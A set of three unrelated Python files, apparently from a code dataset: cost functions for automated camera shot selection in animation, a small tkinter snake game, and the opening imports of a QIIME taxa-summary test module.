    The curve is a combination of two sigmoid functions. Because character eye
    orientation is not modeled in the animation yet, all eyes are assumed to look
    perpendicular to the viewer.
    """
    if not eyepos:
        # no characters to evaluate
        return 0
    cost = 0
    for i, pos in enumerate(eyepos):
        if pos != ["NA", "NA"]:
            # not using eye direction now, character models are not considering eye orientations
            theta = eyeThetas[i]
            [x, y] = pos
            leftRoom = x
            # BUG FIX: right room is a horizontal distance measured against the
            # frame width (FRAMEX); the original subtracted from FRAMESIZE (area)
            rightRoom = FRAMEX - x
            cost += cost_curve.lookRoomCostCurve(leftRoom / FRAMEX, 0)
            # TODO: lookroom cost should consider eye thetas, but our model has limited gaze orientation, ignore for now
            # use right-hand coordinate system
            # if theta <= 0:
            #     # face facing left in 2D
            #     cost += lookRoomCostCurve(leftRoom / FRAMEX, theta)
            # else:
            #     # face facing right in 2D
            #     cost += lookRoomCostCurve(rightRoom / FRAMEX, theta)
        else:
            # character not on screen: full penalty
            cost += 1
    return cost / len(eyepos)
def getHeadRoomCost(headTop):
    """
    :param headTop: per-character on-screen headroom values ("NA" when off screen)
    :return: average headroom cost

    description:
    Characters' heads should be neither too close to nor too far from the top
    boundary of the frame. Off-screen ("NA") entries contribute zero cost but
    still count in the average, matching the original behavior.
    """
    if not headTop:
        # no characters to evaluate (original raised ZeroDivisionError here)
        return 0
    cost = 0
    for top in headTop:
        if top != "NA":
            cost += cost_curve.headRoomCostCurve(top)
    # normalize
    return cost / len(headTop)
def getGazeContinuityCost(faceThetas1, faceThetas2, charImportance):
    """
    :param faceThetas1: character on-screen face orientations in first node
    :param faceThetas2: character on-screen face orientations in second node
    :param charImportance: per-character importance weights
    :return: gaze continuity cost

    description:
    NOT USED IN CURRENT VERSION
    Character gaze direction should be consistent between shots.
    BUG FIX: the original compared the whole lists (TypeError in py3) and used an
    undefined bare `pi`; it now compares per-character thetas against math.pi / 2.
    NOTE(review): cost is added when both thetas fall on the SAME side of pi/2,
    which reads inverted relative to the description — confirm intent before use.
    """
    cost = 0
    for i in range(len(faceThetas1)):
        # zero/None thetas are treated as "no gaze data" and skipped
        if faceThetas1[i] and faceThetas2[i]:
            if (faceThetas1[i] > math.pi / 2 and faceThetas2[i] > math.pi / 2) or \
                    (faceThetas1[i] < math.pi / 2 and faceThetas2[i] < math.pi / 2):
                cost += charImportance[i] * 1
    return cost
def getPosContinuityCost(eyepos1, eyepos2):
    """Return the eye-position continuity cost between two consecutive shots.

    :param eyepos1: character eye position in the first node
    :param eyepos2: character eye position in the second node
    :return: position-change cost from the cost curve

    A character's on-screen eye position should stay consistent across a cut,
    so the cost grows with how far the position jumps between the two nodes.
    """
    return cost_curve.positionChangeCurve(eyepos1, eyepos2)
def getMotionContinuityCost(motion1, motion2):
    """Return the motion continuity cost between two shots.

    :param motion1: character on-screen moving direction in the first node
    :param motion2: character on-screen moving direction in the second node
    :return: 0 when the direction is unchanged, 1 when it flips

    A character's on-screen moving direction should be consistent between shots.
    """
    return 0 if motion1 == motion2 else 1
def getLeftRightContinuityCost(order1, order2):
    """Return the on-screen left/right order continuity cost (180-degree rule).

    :param order1: characters' on-screen order in the first node
    :param order2: characters' on-screen order in the second node
    :return: fraction of positions whose occupant changed, or 0 when the two
             orders are empty or have different lengths (incomparable casts)

    Characters' relative screen positions should be consistent across a cut.
    """
    if len(order1) != len(order2) or not order1:
        return 0
    mismatches = sum(a != b for a, b in zip(order1, order2))
    return mismatches / len(order1)
def getShotOrderCost(dist):
    """Return the shot-order cost for a camera at the given shot distance.

    :param dist: numeric shot-size/distance value for the camera
    :return: shot order cost

    Background information should be exposed at the beginning of a scene, so
    cameras with a larger shot size should be more likely to appear early on.
    """
    orderCost = cost_curve.shotOrderCurve(dist)
    return orderCost
def getDurationCost(node1, node2, d):
    """Return the duration (hop) cost for the edge from node1 to node2.

    :param node1: first node [time, camera]
    :param node2: second node [time, camera]
    :param d: duration in time steps
    :return: duration cost

    The patent suggests shot intensity proportional to the user-specified story
    intensity; director hints are not modeled yet, so the curve assumes an
    average duration of 3 seconds. Staying on the same camera (no cut) is
    charged as a zero-length shot.
    """
    effectiveDuration = 0 if node1[1] == node2[1] else d
    return cost_curve.durationCurve(effectiveDuration)
def getCharacterConflictsCost(node, conflict_int):
    """
    :param node: graph node
    :param conflict_int: user defined character conflict intensity
    :return: conflict cost

    NOTE: not implemented yet; placeholder that returns None.
    """
    pass
def getCharacterEmotionCost(node, emotion_int):
    """
    :param node: graph node
    :param emotion_int: user defined emotion intensity
    :return: emotion cost

    NOTE: not implemented yet; placeholder that returns None.
    """
    pass
def getCameraMovementCost(node, handheld_int):
    """
    :param node: graph node
    :param handheld_int: user defined handheld intensity
    :return: handheld cost

    NOTE: not implemented yet; placeholder that returns None.
    """
    pass
def getPOVCost(t, cam, protagonist, cameraIndex, characterIndex):
    """
    :param t: node time
    :param cam: node camera
    :param protagonist: story protagonist
    :param cameraIndex: camera description list
    :param characterIndex: character description list
    :return: POV cost (0 when this camera is the protagonist's POV camera, 1 otherwise)
    description:
    In the patent, POV is one of the user inputs for fixing default cameras. Here, due to the incomplete user input, if a character is mentioned
    to "look" at something and this character has high importance (the computed protagonist), try to trigger this character's POV camera.
    """
    return 1 - utils.isPOV(cam, protagonist, cameraIndex, characterIndex)
def getEscapeFactor(node):
    """
    :param node: camera node
    :return: escape cost

    NOTE: not implemented yet; placeholder that returns None.
    """
    pass
def getQualityCost(t, cam, qualityHash, startTime, endTime):
    """Look up the precomputed node (quality) cost for time t and camera cam.

    :param t: time step (-1 marks the dummy start node)
    :param cam: camera index
    :param qualityHash: precomputed cost table indexed [t - startTime][cam]
    :param startTime: user defined animation start time
    :param endTime: user defined animation end time
    :return: node quality cost (0 for the dummy start/end nodes)
    """
    if t in (-1, endTime + 1):
        # dummy boundary nodes carry no quality cost
        return 0
    return qualityHash[t - startTime][cam]
def getDurationQualityCost(node, duration, qualityHash, startTime, endTime):
    """Accumulate the node quality cost over `duration` consecutive time steps.

    :param node: graph node [time, camera]
    :param duration: number of time steps the shot lasts
    :param qualityHash: precomputed cost table indexed [t - startTime][cam]
    :param startTime: user defined animation start time
    :param endTime: user defined animation end time
    :return: summed quality cost for the shot starting at node over `duration`
    """
    t0, cam = node[0], node[1]
    return sum(getQualityCost(t0 + step, cam, qualityHash, startTime, endTime)
               for step in range(duration))
def getInterActionCost(t1, t2, script):
    """
    Not enabled by default. If content trim is done before optimization, this cost is needed:
    for a run of similar actions the optimizer treats them evenly and may cut anywhere
    inside the run, possibly cutting inside a complete sentence. Penalizing cross-action
    cuts (except cuts landing exactly on the next action's start time) discourages that.
    """
    index1 = utils.getActionIndex(t1, script)
    index2 = utils.getActionIndex(t2, script)
    if index1 == index2:
        # same action: the cut is free
        return 0
    # cross-action cut: free only when it lands exactly on the next action's start
    # print("from time {} to time {} is cross action".format(t1, t2))
    return 0 if t2 == script.iloc[index2]["startTime"] else 1
# prepare node cost for graph nodes when no user free cameras are added
def prepareQualityHashWoUserCam(qualityHash, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, vis, headRoom, eye, distMap, objIndex = None, objVisibility = None):
    """
    description: prepare node cost (no user free cameras considered)
    Node quality costs are calculated before dynamic programming. This eases the computation
    because each node cost only depends on features of the node itself. Once calculated,
    the costs are stored in qualityHash (filled in place):
    qualityHash[i][j] = node cost at time startTime + i for camera j.
    When objIndex is given, the item-aware cost (WObj) is used; otherwise the
    character-only cost (WoObj).
    """
    if objIndex:
        # user-interested items exist: subjects/objects may be items as well as characters
        for i in range(len(qualityHash)):
            for j in range(len(qualityHash[0])):
                print("prepare quality hash for time {} cam {}".format(i, j))
                qualityHash[i][j] = getWeightedQualityCostWObj([startTime + i, j], totalTime, startTime, endTime,
                                                               cameraIndex, characterIndex, protagonist, script,
                                                               vis, headRoom, eye, distMap, objIndex=objIndex,
                                                               objVisibility=objVisibility)
    else:
        # character-only scenario
        for i in range(len(qualityHash)):
            for j in range(len(qualityHash[0])):
                print("prepare quality hash for time {} cam {}".format(i, j))
                qualityHash[i][j] = getWeightedQualityCostWoObj([startTime + i, j], totalTime, startTime, endTime,
                                                                cameraIndex, characterIndex, protagonist, script,
                                                                vis, headRoom, eye, distMap)
# prepare node cost for graph nodes when there are user free cameras added
def prepareQualityHashWUserCam(qualityHash, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf, visDf, headRoomDf, eyeDf, distMap, objIndex = None, objVisibility = None, userCamData = None):
    """
    description: prepare node cost (user free cameras considered)
    Node quality costs are calculated before dynamic programming. This eases the computation
    because each node cost only depends on features of the node itself. Once calculated,
    the costs are stored in qualityHash (filled in place).
    User free cameras need no node cost because they must cover the user-specified time
    period; knowing when they are active lets us skip generating node costs for default
    nodes in those time intervals.
    """
    if objIndex:
        # user-interested items exist: use the item-aware node cost
        for i in range(len(qualityHash)):
            if userCamData:
                # NOTE(review): this compares the 0-based offset i, while the edge-cost
                # code keys userCamData by absolute node time — confirm the key convention
                if i in userCamData.keys():
                    # skip user added cam times
                    continue
            for j in range(len(qualityHash[0])):
                print("prepare quality hash for time {} cam {}".format(i, j))
                qualityHash[i][j] = getWeightedQualityCostWObj([startTime + i, j], totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf,
                                                               visDf, headRoomDf, eyeDf, distMap, objIndex=objIndex, objVisibility=objVisibility)
        print("finish generating default quality cost hash!!!")
    else:
        # character-only scenario
        for i in range(len(qualityHash)):
            if userCamData:
                if i in userCamData.keys():
                    # skip user added cam times
                    continue
            for j in range(len(qualityHash[0])):
                print("prepare quality hash for time {} cam {}".format(i, j))
                qualityHash[i][j] = getWeightedQualityCostWoObj([startTime + i, j], totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf,
                                                                visDf, headRoomDf, eyeDf, distMap)
        print("finish generating default quality cost hash!!!")
# prepare quality cost with user specified items added
def getWeightedQualityCostWObj(node, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, charVisibility, headRoomData, eyePosData, distMap, objIndex, objVisibility):
    """
    quality cost == node cost
    Node-cost variant used when user-interested items ARE present (objIndex /
    objVisibility given), so an action's subjects and objects can be characters
    or items. (The original docstring here was swapped with the WoObj variant.)
    node is [time, camera]; returns the weighted sum of visibility, hitchcock,
    lookroom, headroom, POV and shot-order costs via QUALITY_WEIGHTS.
    """
    # dummy start node and dummy end node has 0 quality cost
    if node[0] == -1 or node[0] == endTime + 1:
        return 0
    # action proximity cost
    index = utils.getActionIndex(node[0], script) #action sequence index
    actions_list = utils.getActions(node[0], index, script) #action
    if len(actions_list) > 1:
        print("parallel actions happen at time: {}, actions: {}".format(node[0], actions_list))
    subs_list = utils.getSubjects(node[0], index, script, characterIndex, objIndex)
    # subs = [characters[x] for x in subs]
    objs_list = utils.getObjects(node[0], index, script, characterIndex, objIndex)
    # objs = [characters[x] for x in objs]
    # print("subs: ", subs)
    # print("objs: ", objs)
    assert len(actions_list) == len(subs_list) == len(objs_list), "for script at time {}, number of actions is not compatible with number of subjects and objects".format(node[0])
    visCosts = []
    subVis_list = []
    objVis_list = []
    # gather per-action subject/object visibilities (items read from objVisibility,
    # characters from charVisibility) and compute the visibility cost per action
    for i in range(len(actions_list)):
        subVis = []
        objVis = []
        # animation_time = getAnimationStartTime(node[0], index, script)
        for sub in subs_list[i]:
            if sub in objIndex.keys():
                # sub is an object
                sub = objIndex[sub]
                subVis.append(utils.getObjVisibility(sub, node[0], node[1], objVisibility))
            else:
                sub = characterIndex[sub]
                subVis.append(utils.getCharVisibility(sub, node[0], node[1], charVisibility))
        for obj in objs_list[i]:
            if obj in objIndex.keys():
                # obj is an item
                obj = objIndex[obj]
                objVis.append(utils.getObjVisibility(obj, node[0], node[1], objVisibility))
            else:
                obj = characterIndex[obj]
                objVis.append(utils.getCharVisibility(obj, node[0], node[1], charVisibility))
        visCosts.append(getVisibilityCost(subVis, objVis))
        subVis_list.append(subVis)
        objVis_list.append(objVis)
    visCost = sum(visCosts) / len(visCosts)
    # hitchcock cost
    hitchCockCost = getHitchCockCost(actions_list, subVis_list, objVis_list)
    # lookroom cost: only character subjects have eye positions; items are skipped
    lookRoomCosts = []
    for i in range(len(actions_list)):
        eyePos = []
        for sub in subs_list[i]:
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
                eyePos.append(utils.getDefaultEyePos(sub, node[0], node[1], eyePosData))
        # for obj in objs:
        #     eyePos.append(getEyePos(node[0], node[1], obj, eyeDf))
        # face thetas not ready yet, for lookroom cost assume all have 0 thetas
        eyeThetas = [0] * len(eyePos)
        # for sub in subs:
        #     eyeThetas.append(getFaceThetas(node[0], node[1], sub, faceThetaDf))
        # for obj in objs:
        #     eyeThetas.append(getFaceThetas(node[0], node[1], obj, faceThetasDf))
        lookRoomCosts.append(getLookRoomCost(eyePos, eyeThetas))
    lookRoomCost = sum(lookRoomCosts) / len(lookRoomCosts)
    # headroom cost
    headRoomCosts = []
    for i in range(len(actions_list)):
        headRoom = []
        # only characters have eyes related cost
        for sub in subs_list[i]:
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
                headRoom.append(utils.getHeadRoom(node[0], node[1], sub, headRoomData))
        for obj in objs_list[i]:
            if obj in characterIndex.keys():
                obj = characterIndex[obj]
                headRoom.append(utils.getHeadRoom(node[0], node[1], obj, headRoomData))
        headRoomCosts.append(getHeadRoomCost(headRoom))
    headRoomCost = sum(headRoomCosts) / len(headRoomCosts)
    povCost = 1
    # print("action is {}".format(actions_list))
    # print("protagonist; ", protagonist)
    # POV trigger: a "look" action whose subjects include the protagonist
    if "look" in actions_list and (any(characterIndex[protagonist] in sublist for sublist in subs_list)):
        # possibly trigger POV
        print("possible POV trigger!")
        povCost = getPOVCost(node[0], node[1], characterIndex[protagonist], cameraIndex, characterIndex)
    # print("POV COST: ", povCost)
    shotOrderCost = 1
    if node[0] < totalTime * .1:
        # if time is in the first 10%
        dist = cameraIndex[node[1]]["distance"]
        if dist != "NA":
            dist = distMap[dist]
            shotOrderCost = getShotOrderCost(dist)
        else:
            # no POV camera at the beginning of video to avoid confusion
            shotOrderCost = 1
    # weighted node cost summation
    qualityCost = visCost * QUALITY_WEIGHTS[0] + \
                  hitchCockCost * QUALITY_WEIGHTS[1] + \
                  lookRoomCost * QUALITY_WEIGHTS[2] + \
                  headRoomCost * QUALITY_WEIGHTS[3] + \
                  povCost * QUALITY_WEIGHTS[4] + \
                  shotOrderCost * QUALITY_WEIGHTS[5]
    return qualityCost
# prepare quality cost with out user specified items added
def getWeightedQualityCostWoObj(node, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, charVisibility, headRoomData, eyePosData, distMap):
    """
    quality cost == node cost
    Node-cost variant used when NO user-interested items exist, so all action
    subjects and objects are characters. (The original docstring here was
    swapped with the WObj variant.)
    node is [time, camera]; returns the weighted sum of visibility, hitchcock,
    lookroom, headroom, POV and shot-order costs via QUALITY_WEIGHTS.
    """
    # dummy start node and dummy end node has 0 quality cost
    if node[0] == -1 or node[0] == endTime + 1:
        return 0
    # action proximity cost
    index = utils.getActionIndex(node[0], script) #action sequence index
    actions_list = utils.getActions(node[0], index, script) #action
    # print("action: ", actions_list)
    subs_list = utils.getSubjects(node[0], index, script, characterIndex, objIndex=None)
    # subs = [characters[x] for x in subs]
    objs_list = utils.getObjects(node[0], index, script, characterIndex, objIndex=None)
    # objs = [characters[x] for x in objs]
    # print("subs: ", subs)
    # print("objs: ", objs)
    subVis_list = []
    objVis_list = []
    visCosts = []
    # animation_time = getAnimationStartTime(node[0], index, script)
    # gather per-action character visibilities and compute per-action visibility cost
    for i in range(len(actions_list)):
        subVis = []
        objVis = []
        for sub in subs_list[i]:
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
                subVis.append(utils.getCharVisibility(sub, node[0], node[1], charVisibility))
        for obj in objs_list[i]:
            if obj in characterIndex.keys():
                obj = characterIndex[obj]
                objVis.append(utils.getCharVisibility(obj, node[0], node[1], charVisibility))
        # print("t: {}, cam: {} sub visibility: {}".format(node[0], node[1], subVis))
        # print("t: {}, cam: {} obj visibility: {}".format(node[0], node[1], objVis))
        subVis_list.append(subVis)
        objVis_list.append(objVis)
        # print(subVis, objVis)
        if subVis:
            visCosts.append(getVisibilityCost(subVis, objVis))
        else:
            # no visible subjects recorded for this action: treat as zero cost
            visCosts.append(0)
    print(subs_list)
    print(objs_list)
    print(subVis_list)
    print(objVis_list)
    visCost = sum(visCosts) / len(visCosts)
    # hitchcock cost
    hitchCockCost = getHitchCockCost(actions_list, subVis_list, objVis_list)
    # lookroom cost
    lookRoomCosts = []
    for i in range(len(actions_list)):
        eyePos = []
        for sub in subs_list[i]:
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
                eyePos.append(utils.getDefaultEyePos(sub, node[0], node[1], eyePosData))
        # for obj in objs:
        #     eyePos.append(getEyePos(node[0], node[1], obj, eyeDf))
        # face thetas not ready yet, for lookroom cost assume all have 0 thetas
        eyeThetas = [0] * len(eyePos)
        # for sub in subs:
        #     eyeThetas.append(getFaceThetas(node[0], node[1], sub, faceThetaDf))
        # for obj in objs:
        #     eyeThetas.append(getFaceThetas(node[0], node[1], obj, faceThetasDf))
        lookRoomCosts.append(getLookRoomCost(eyePos, eyeThetas))
    lookRoomCost = sum(lookRoomCosts) / len(lookRoomCosts)
    # headroom cost
    headRoomCosts = []
    # only characters have eyes related cost
    for i in range(len(actions_list)):
        headRoom = []
        for sub in subs_list[i]:
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
                headRoom.append(utils.getHeadRoom(node[0], node[1], sub, headRoomData))
        for obj in objs_list[i]:
            if obj in characterIndex.keys():
                obj = characterIndex[obj]
                headRoom.append(utils.getHeadRoom(node[0], node[1], obj, headRoomData))
        if headRoom:
            headRoomCosts.append(getHeadRoomCost(headRoom))
    # NOTE(review): if no action involves a character, headRoomCosts stays empty and
    # the division below raises ZeroDivisionError — confirm upstream guarantees
    headRoomCost = sum(headRoomCosts) / len(headRoomCosts)
    povCost = 1
    povCosts = []
    # print("action is {}".format(actions_list))
    # print("protagonist; ", protagonist)
    for i in range(len(actions_list)):
        # NOTE(review): the protagonist check scans ALL actions' subjects (subs_list),
        # not just action i's (subs_list[i]) — confirm whether that is intended
        if actions_list[i] == "look" and any(characterIndex[protagonist] in sublist for sublist in subs_list):
            print("possible POV trigger!")
            povCosts.append(getPOVCost(node[0], node[1], characterIndex[protagonist], cameraIndex, characterIndex))
    if povCosts:
        povCost = sum(povCosts) / len(povCosts)
    shotOrderCost = 1
    if node[0] < totalTime * .1:
        # if time is in the first 10%
        dist = cameraIndex[node[1]]["distance"]
        if dist != "NA":
            dist = distMap[dist]
            shotOrderCost = getShotOrderCost(dist)
        else:
            # no POV camera at the beginning of video to avoid confusion
            shotOrderCost = 1
    # weighted node cost summation
    qualityCost = visCost * QUALITY_WEIGHTS[0] + \
                  hitchCockCost * QUALITY_WEIGHTS[1] + \
                  lookRoomCost * QUALITY_WEIGHTS[2] + \
                  headRoomCost * QUALITY_WEIGHTS[3] + \
                  povCost * QUALITY_WEIGHTS[4] + \
                  shotOrderCost * QUALITY_WEIGHTS[5]
    return qualityCost
# get edge cost when there are user added free cameras
def getWeightedTransferCostWithUserCams(node1, node2, endTime, characters, script, eyePosData, leftRightOrderData, userCamData, objects):
    """
    description:
    transfer cost == edge cost
    This is calculating edge cost between nodes considering user added cameras.
    So the transfer can be categorized into 4 groups: 1. default -> default, 2. default -> user 3. user -> default 4. user -> user
    For user added cameras, since we do not consider their node cost but only edge cost and hop cost, we retrieve their start node and end node data
    and calculate based on these data.
    The result combines eye-position continuity (TRANSFER_WEIGHTS[1]) and
    left/right screen-order continuity (TRANSFER_WEIGHTS[3]).
    """
    # dummy nodes' input/output edges carry no transfer cost
    if node1[0] == -1 or node2[0] == endTime + 1:
        return 0
    # 4 conditions for node1, node2 pairs
    # 1. default -> default 2. default -> user 3. user -> default 4. user -> user
    user1 = (node1[0] in userCamData.keys())
    user2 = (node2[0] in userCamData.keys())
    if user1 and user2:
        # user defined cameras to user defined cameras, no need to consider transfer cost
        return 0
    duration = node2[0] - node1[0]
    index1 = utils.getActionIndex(node1[0], script)
    index2 = utils.getActionIndex(node2[0], script)
    subs1 = utils.getSubjects(node1[0], index1, script, characters, objects)
    subs2 = utils.getSubjects(node2[0], index2, script, characters, objects)
    objs1 = utils.getObjects(node1[0], index1, script, characters, objects)
    objs2 = utils.getObjects(node2[0], index2, script, characters, objects)
    posCost = 0
    posCount = 0
    if user1 and user2:
        # NOTE(review): dead code — this case already returned above
        # user defined cameras to user defined cameras, no need to consider transfer cost
        return 0
    # eye position change cost, only for subjects present in both nodes;
    # default-camera ends read from eyePosData, user-camera ends from userCamData
    for sub in (item for sublist in subs1 for item in sublist):
        if any(sub in sublist for sublist in subs2):
            if sub in characters.keys():
                sub = characters[sub]
            if not user1 and user2:
                eyePos1 = utils.getDefaultEyePos(sub, node1[0] + duration - 1, node1[1], eyePosData)
                eyePos2 = utils.getUserEyePos(sub, node2[0], userCamData, "start")
            if user1 and not user2:
                eyePos1 = utils.getUserEyePos(sub, node1[0], userCamData, "end")
                eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
            if not user1 and not user2:
                eyePos1 = utils.getDefaultEyePos(sub, node1[0] + duration - 1, node1[1], eyePosData)
                eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
            if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
                # normalize to frame-relative coordinates before the curve
                eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
                eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
                posCount += 1
                posCost += getPosContinuityCost(eyePos1, eyePos2)
    # same continuity check for objects present in both nodes
    for obj in (item for sublist in objs1 for item in sublist):
        if any(obj in sublist for sublist in objs2):
            if obj in characters.keys():
                obj = characters[obj]
            if not user1 and user2:
                eyePos1 = utils.getDefaultEyePos(obj, node1[0] + duration - 1, node1[1], eyePosData)
                eyePos2 = utils.getUserEyePos(obj, node2[0], userCamData, "start")
            if user1 and not user2:
                eyePos1 = utils.getUserEyePos(obj, node1[0], userCamData, "end")
                eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
            if not user1 and not user2:
                eyePos1 = utils.getDefaultEyePos(obj, node1[0] + duration - 1, node1[1], eyePosData)
                eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
            if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
                eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
                eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
                posCount += 1
                posCost += getPosContinuityCost(eyePos1, eyePos2)
    if posCount != 0:
        posCost = posCost / posCount
    # left right order cost
    if user1 and not user2:
        leftRight1 = utils.getUserLeftRightOrder(node1[0], userCamData, "end")
        leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightOrderData)
    if not user1 and user2:
        leftRight1 = utils.getDefaultLeftRightOrder(node1[0] + duration - 1, node1[1], leftRightOrderData)
        leftRight2 = utils.getUserLeftRightOrder(node2[0], userCamData, "start")
    if not user1 and not user2:
        leftRight1 = utils.getDefaultLeftRightOrder(node1[0] + duration - 1, node1[1], leftRightOrderData)
        leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightOrderData)
    leftRightCost = getLeftRightContinuityCost(leftRight1, leftRight2)
    # weighted edge cost summation
    transferCost = posCost * TRANSFER_WEIGHTS[1] + \
                   leftRightCost * TRANSFER_WEIGHTS[3]
    return transferCost
# get edge cost when there are no user added free cameras
def getWeightedTransferCostWoUserCam(node1, node2, endTime, characterIndex, script, eyePosData, leftRightData, items):
    """
    description:
    transfer cost == edge cost
    This calculates the edge cost between two default-camera nodes (no user added cameras involved).
    It combines eye-position continuity (TRANSFER_WEIGHTS[1]) and left/right
    screen-order continuity (TRANSFER_WEIGHTS[3]).
    """
    # dummy nodes' input/output edges have 0 transfer cost
    if node1[0] == -1 or node2[0] == endTime + 1:
        return 0
    index1 = utils.getActionIndex(node1[0], script)
    subs1 = utils.getSubjects(node1[0], index1, script, characterIndex, items)
    # BUG FIX: the original passed node1[1] (the camera) as the time argument
    objs1 = utils.getObjects(node1[0], index1, script, characterIndex, items)
    index2 = utils.getActionIndex(node2[0], script)
    subs2 = utils.getSubjects(node2[0], index2, script, characterIndex, items)
    objs2 = utils.getObjects(node2[0], index2, script, characterIndex, items)
    # eye position continuity: only for subjects/objects present in both nodes
    posCost = 0
    posCount = 0
    for sub in (item for sublist in subs1 for item in sublist):
        if any(sub in sublist for sublist in subs2):
            if sub in characterIndex.keys():
                sub = characterIndex[sub]
            eyePos1 = utils.getDefaultEyePos(sub, node1[0], node1[1], eyePosData)
            eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
            if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
                # CONSISTENCY FIX: count only valid (on-screen) pairs, matching
                # getWeightedTransferCostWithUserCams; the original also counted
                # "NA" pairs, diluting the averaged cost
                eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
                eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
                posCount += 1
                posCost += getPosContinuityCost(eyePos1, eyePos2)
    for obj in (item for sublist in objs1 for item in sublist):
        if any(obj in sublist for sublist in objs2):
            if obj in characterIndex.keys():
                obj = characterIndex[obj]
            eyePos1 = utils.getDefaultEyePos(obj, node1[0], node1[1], eyePosData)
            eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
            if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
                eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
                eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
                posCount += 1
                posCost += getPosContinuityCost(eyePos1, eyePos2)
    if posCount != 0:
        posCost = posCost / posCount
    # Gaze Continuity, our modules don't have gaze features for now
    # faceTheta1 = getFaceThetas(node1, faceThetasDf)
    # faceTheta2 = getFaceThetas(node2, faceThetasDf)
    # gazeCost = getGazeContinuityCost(faceTheta1, faceTheta2)
    # moving motion continuity, not considered now
    # motion1 = getMotion(node1, motionDf)
    # motion2 = getMotion(node2, motionDf)
    # motionCost = getMotionContinuityCost(motion1, motion2)
    leftRight1 = utils.getDefaultLeftRightOrder(node1[0], node1[1], leftRightData)
    leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightData)
    leftRightCost = getLeftRightContinuityCost(leftRight1, leftRight2)
    # weighted edge cost summation
    transferCost = posCost * TRANSFER_WEIGHTS[1] + \
                   leftRightCost * TRANSFER_WEIGHTS[3]
    return transferCost
|
from collections import deque
from tkinter import *
def key_pressed(event):
    """Handle arrow-key presses: compute the new head rectangle and advance the snake.

    Each press moves the head 10 px in the pressed direction. Body cells are
    [x0, y0, x1, y1] lists as used by canvas.create_rectangle; body[0] is the head.
    """
    global body
    if event.keysym == 'Up':
        head = [body[0][0], body[0][1] - 10, body[0][2], body[0][3] - 10]
    elif event.keysym == 'Down':
        head = [body[0][0], body[0][1] + 10, body[0][2], body[0][3] + 10]
    elif event.keysym == 'Left':
        head = [body[0][0] - 10, body[0][1], body[0][2] - 10, body[0][3]]
    elif event.keysym == 'Right':
        head = [body[0][0] + 10, body[0][1], body[0][2] + 10, body[0][3]]
    else:
        # BUG FIX: any other key previously left `head` unbound and raised
        # NameError in update_body; ignore non-arrow keys instead
        return
    update_body(head)
def draw_body():
    """Render every snake segment in blue, then repaint the head in red."""
    global body
    for segment in body:
        canvas.create_rectangle(segment, fill = 'blue', outline = 'white')
    # body[0] is the head; draw it again on top so it stands out
    canvas.create_rectangle(body[0], fill = 'red', outline = 'white')
def update_body(head):
    """Advance the snake one step: erase the old tail, push the new head, redraw."""
    global body
    tail = body.pop()
    # paint the removed tail cell white so it disappears from the canvas
    canvas.create_rectangle(tail, fill = 'white', outline = 'white')
    body.appendleft(head)
    draw_body()
# build the main window and the drawing canvas
root = Tk()
root.title("贪吃蛇之画蛇身")
canvas = Canvas(root, width = 495, height = 305, bg = 'white')
# initial snake cells, each [x0, y0, x1, y1] for canvas.create_rectangle
b1 = [0 , 0, 10, 10]
b2 = [10, 0, 20, 10]
b3 = [20, 0, 30, 10]
b4 = [30, 0, 40, 10]
# deque gives O(1) appendleft/pop when the snake advances;
# b4 (the rightmost cell) ends up at index 0, i.e. the head
body = deque()
body.append(b4)
body.append(b3)
body.append(b2)
body.append(b1)
draw_body()
# steer with the arrow keys; key_pressed dispatches on event.keysym
root.bind('<Key-Left>', key_pressed)
root.bind('<Key-Right>', key_pressed)
root.bind('<Key-Down>', key_pressed)
root.bind('<Key-Up>', key_pressed)
canvas.pack()
root.mainloop()
|
#!/usr/bin/env python
from __future__ import division
"""Tests of code for summarizing taxa in an OTU table"""
__author__ = "Rob Knight"
__copyright__ = "Copyright 2011, The QIIME Project"
#remember to add yourself if you make changes
__credits__ = ["Rob Knight", "Daniel McDonald", "Antonio Gonzalez Pena",
"Jose Carlos Clemente Litran", "Jai Ram Rideout"]
__license__ = "GPL"
__version__ = "1.7.0-dev"
__maintainer__ = "Daniel McDonald"
__email__ = "wasade@gmail.com"
__status__ = "Development"
from cogent.util.unit_test import TestCase, main
from qiime.parse import parse_mapping_file
from qiime.util import convert_otu_table_relative
from numpy import array
from biom.exception import TableException
from biom.table import SparseOTUTable, SparseTaxonTable, table_factory
from biom.parse import parse_biom_table
from qiime.summarize_taxa import (_make_collapse_fn, make_summary,
add_summary_mapping)
